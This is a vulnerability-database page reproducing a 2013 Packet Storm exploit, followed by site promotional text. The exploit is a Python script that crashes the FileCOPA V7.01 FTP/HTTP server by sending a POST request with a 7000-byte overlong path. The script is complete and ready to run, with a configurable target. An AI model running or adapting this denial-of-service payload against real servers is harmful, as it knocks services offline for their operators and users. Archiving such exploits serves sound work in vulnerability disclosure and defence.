Lucene search
K

FileCOPA 7.01 Denial Of Service

🗓️ 02 Jul 2013 00:00:00Reported by ChakoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

FileCOPA V7.01 HTTP POST Denial Of Service exploi

Code
`#!/usr/bin/python  
#  
#  
####################################################################  
#  
# Exploit Title: FileCOPA V7.01 HTTP POST Denial Of Service  
# Date: 2013/7/1  
# Exploit Author: Chako  
# Vendor Homepage: http://www.filecopa.com/  
# Software Download Link: http://www.filecopa.com/download.php  
# Version: V7.01  
# Tested on: Windows 7 SP1 English  
#  
####################################################################  
  
import socket  
import sys  
  
  
PAYLOAD = "\x41" * 7000  
  
  
print("\n\n[+] FileCOPA V7.01 HTTP POST Denial Of Service")  
print("[+] Version: V7.01")  
print("[+] Chako\n\n\n")  
  
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect(('127.0.0.1',81))  
  
s.send("POST /" + PAYLOAD + "/ HTTP/1.0\r\n\r\n")  
  
  
s.close()  
print("[!] Done! Exploit successfully sent\n")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation